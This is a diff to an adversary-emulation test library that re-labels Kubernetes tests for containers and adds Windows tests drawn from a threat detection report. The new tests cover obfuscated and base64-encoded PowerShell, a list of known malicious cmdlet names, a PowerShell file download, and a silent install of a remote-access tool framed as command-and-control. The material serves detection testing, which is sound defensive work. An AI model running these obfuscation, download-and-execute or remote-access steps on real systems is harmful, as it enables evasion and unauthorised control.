- Atomic Test #1: ListSecrets [macos, linux] + - Atomic Test #1: ListSecrets [containers] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) - Atomic Test #1: SSH Credential Stuffing From Linux [linux] @@ -103,8 +103,8 @@ - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] @@ -118,7 +118,7 @@ - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1611 Escape to Host](../../T1611/T1611.md) - - Atomic Test #1: Deploy container using nsenter container escape [linux] + - Atomic Test #1: Deploy container using nsenter container escape [containers] - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -430,8 +430,8 @@ - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -648,10 +648,10 @@ - Atomic Test #1: At - Schedule a job [linux] - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1609 Container Administration Command](../../T1609/T1609.md) - - Atomic Test #1: ExecIntoContainer [linux, macos] + - Atomic Test #1: ExecIntoContainer [containers] - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d85cc21e..672d6010 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -470,6 +470,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -489,6 +490,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) @@ -960,6 +962,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -983,6 +986,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #2: XOR Encoded data. [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1038,6 +1042,8 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -1063,6 +1069,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f451fdb..5e234174 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -552,8 +552,7 @@ credential-access: ' supported_platforms: - - macos - - linux + - containers input_arguments: namespace: description: K8s namespace to list @@ -631,7 +630,9 @@ credential-access: ' name: sh - cleanup_command: kubectl --context kind-atomic-cluster delete pod atomic-pod + cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod + +' T1056.004: technique: external_references: @@ -11009,8 +11010,7 @@ privilege-escalation: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -11036,8 +11036,7 @@ privilege-escalation: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -12434,7 +12433,7 @@ privilege-escalation: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ supported_platforms: - - linux + - containers dependency_executor_name: sh dependencies: - description: Verify docker is installed. @@ -28655,6 +28654,28 @@ defense-evasion: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' name: powershell + - name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: 'Use Mshta to execute arbitrary PowerShell. Example is from the + 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: 'mshta.exe "about:''" + +' + name: command_prompt T1218.007: technique: id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 @@ -29529,6 +29550,25 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +' + name: powershell + - name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: 'This is an obfuscated PowerShell command which when executed prints + "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report + by Red Canary. + +' + supported_platforms: + - windows + executor: + command: '$cmDwhy =[TyPe]("{0}{1}" -f ''S'',''TrING'') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f''nv'',''cO'',''ert'') ; &("{0}{2}{3}{1}{4}" + -f''In'',''SiO'',''vOKe-EXp'',''ReS'',''n'') ( (&("{1}{2}{0}"-f''blE'',''gET-'',''vaRIA'') (''CMdw''+''h''+''y''))."v`ALUe"::("{1}{0}" + -f''iN'',''jO'').Invoke('''',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 + , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, + 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( + [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + ' name: powershell T1218.008: @@ -39273,8 +39313,7 @@ persistence: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -39300,8 +39339,7 @@ persistence: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -58011,8 +58049,7 @@ execution: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to use @@ -58102,8 +58139,7 @@ execution: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -58129,8 +58165,7 @@ execution: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -60105,6 +60140,55 @@ execution: -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: 'Use of obfuscated PowerShell to execute an arbitrary command; + outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection + Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: 'powershell.exe -e #{obfuscated_code} + +' + name: command_prompt + - name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: '"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", + "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", + "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", + "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", + "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", + "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", + "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", + "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", + "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", + "Set-CriticalProcess", "Set-MasterBootRecord" + +' + executor: + name: powershell + elevation_required: true + command: |- + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} T1059.006: technique: external_references: @@ -61581,6 +61665,27 @@ execution: ' name: command_prompt + - name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: 'Command line executed via suspicious invocation. Example is from + the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} + & type #{output_file}\n" + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 @@ -65221,6 +65326,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references: @@ -66242,6 +66368,23 @@ command-and-control: $file1 -ErrorAction Ignore" name: powershell elevation_required: true + - name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: 'An adversary may attempt to trick the user into downloading GoToAssist + and use to establish C2. Download of GoToAssist installer will be at the destination + location and ran when sucessfully executed. + +' + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true T1132.001: technique: external_references: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index e40093ff..93dfbd53 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -22,6 +22,8 @@ Adversaries may also obfuscate commands executed from payloads or directly via a - [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http) +- [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell) +
@@ -266,4 +268,32 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +
+
+ +## Atomic Test #7 - Obfuscated Command in PowerShell +This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8b3f4ed6-077b-4bdd-891c-2d237f19410f + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) +``` + + + + + +
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 7210e5af..4d5a5c58 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -150,3 +150,15 @@ atomic_tests: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell + +- name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: | + This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + executor: + command: | + $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + name: powershell + diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index fc86bcbc..fcc3edfc 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -16,7 +16,7 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con ## Atomic Test #1 - ListCronjobs Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. -**Supported Platforms:** Linux, macOS +**Supported Platforms:** Containers **auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd @@ -49,7 +49,7 @@ kubectl get cronjobs -n #{namespace} ## Atomic Test #2 - CreateCronjob Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. -**Supported Platforms:** Linux, macOS +**Supported Platforms:** Containers **auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 diff --git a/atomics/T1053.007/T1053.007.yaml b/atomics/T1053.007/T1053.007.yaml index 30e260ab..81f4b5c5 100644 --- a/atomics/T1053.007/T1053.007.yaml +++ b/atomics/T1053.007/T1053.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -25,8 +24,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -40,4 +38,4 @@ atomic_tests: cleanup_command: | kubectl delete cronjob art -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index d86d109d..f780b418 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -46,6 +46,10 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) + +- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets) +
@@ -768,4 +772,74 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #19 - PowerShell Command Execution +Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell.exe -e #{obfuscated_code} +``` + + + + + + +
+
+ +## Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets +Powershell execution of known Malicious PowerShell Cmdlets + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 49eb9404-5e0f-4031-a179-b40f7be385e3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| Malicious_cmdlets | Known Malicious Cmdlets | String | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$malcmdlets = #{Malicious_cmdlets} +foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} +foreach ($cmdlets in $malcmdlets) { + $cmdlets} +``` + + + + + +
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 23915cf6..15509f08 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -374,4 +374,41 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' - name: powershell \ No newline at end of file + name: powershell + +- name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: | + Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: | + powershell.exe -e #{obfuscated_code} + name: command_prompt + +- name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: | + "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" + executor: + name: powershell + elevation_required: true + command: | + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} \ No newline at end of file diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 4a96ddef..61786e57 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +
@@ -101,4 +103,38 @@ del "#{file_contents_path}" +
+
+ +## Atomic Test #3 - Suspicious Execution via Windows Command Shell +Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to output to | string | hello.txt| +| input_message | Message to write to file | string | Hello, from CMD!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} +``` + + + + + +
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index cbe28a3f..3c1952e2 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index caef3d08..57e0c326 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
